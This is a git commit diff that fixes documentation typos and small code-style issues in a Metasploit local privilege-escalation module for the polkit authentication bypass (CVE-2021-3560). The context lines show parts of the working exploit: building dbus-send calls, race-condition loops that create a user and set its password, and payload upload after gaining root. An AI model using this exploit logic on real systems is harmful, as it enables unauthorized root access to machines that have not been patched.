Updated docs
This commit is contained in:
parent
fdbf669da2
commit
9a07039e7e
|
@ -1,6 +1,6 @@
|
|||
## Description
|
||||
|
||||
This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
|
||||
This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
|
||||
The vulnerability enables an unprivileged local user to get a root shell on the system.
|
||||
|
||||
## Vulnerable Application
|
||||
|
@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
|
|||
**SESSION**
|
||||
The session to run this module on.
|
||||
|
||||
**WRITABLE_DIR**
|
||||
Directory to write file to (`%TEMP%` by default).
|
||||
|
||||
**USERNAME**
|
||||
The name of the user the exploit will add to the system
|
||||
|
||||
**PASSWORD**
|
||||
The password for the user to be created
|
||||
|
||||
**WritableDir**
|
||||
Directory to write file to (`%TEMP%` by default).
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Ubuntu 20.04
|
||||
|
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'References' => [
|
||||
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
|
||||
['CVE', '2021-3560'],
|
||||
['EDB', '50011'],
|
||||
['EDB', '50011']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_options([
|
||||
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
|
||||
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
|
||||
OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
||||
OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
||||
])
|
||||
register_advanced_options([
|
||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||
|
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if exploit_set_realname(rand_text_alphanumeric(12))
|
||||
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
|
||||
unless exploit_set_realname(old_realname)
|
||||
print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
|
||||
print_error('Failed to restore the root user\'s original \'RealName\' property value')
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
cmd_args << object_path
|
||||
cmd_args << interface_member
|
||||
args.each do |arg|
|
||||
if arg.is_a? Integer
|
||||
if arg.is_a?(Integer)
|
||||
cmd_args << "int32:#{arg}"
|
||||
elsif arg.is_a? String
|
||||
elsif arg.is_a?(String)
|
||||
cmd_args << "string:'#{arg}'"
|
||||
end
|
||||
end
|
||||
|
@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def upload(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
register_file_for_cleanup path
|
||||
print_status("Writing '#{path}' (#{data.size} bytes) ...")
|
||||
rm_f(path)
|
||||
write_file(path, data)
|
||||
register_file_for_cleanup(path)
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
upload path, data
|
||||
chmod path
|
||||
upload(path, data)
|
||||
chmod(path)
|
||||
end
|
||||
|
||||
def upload_payload
|
||||
|
@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if exploit_set_username(loop_sequence)
|
||||
uid = cmd_exec("id -u #{datastore['USERNAME']}")
|
||||
print_good("User #{datastore['USERNAME']} created with UID #{uid}")
|
||||
print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
||||
print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
||||
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
|
||||
print_good('Obtained code execution has root!')
|
||||
fname = upload_payload
|
||||
|
|
Loading…
Reference in New Issue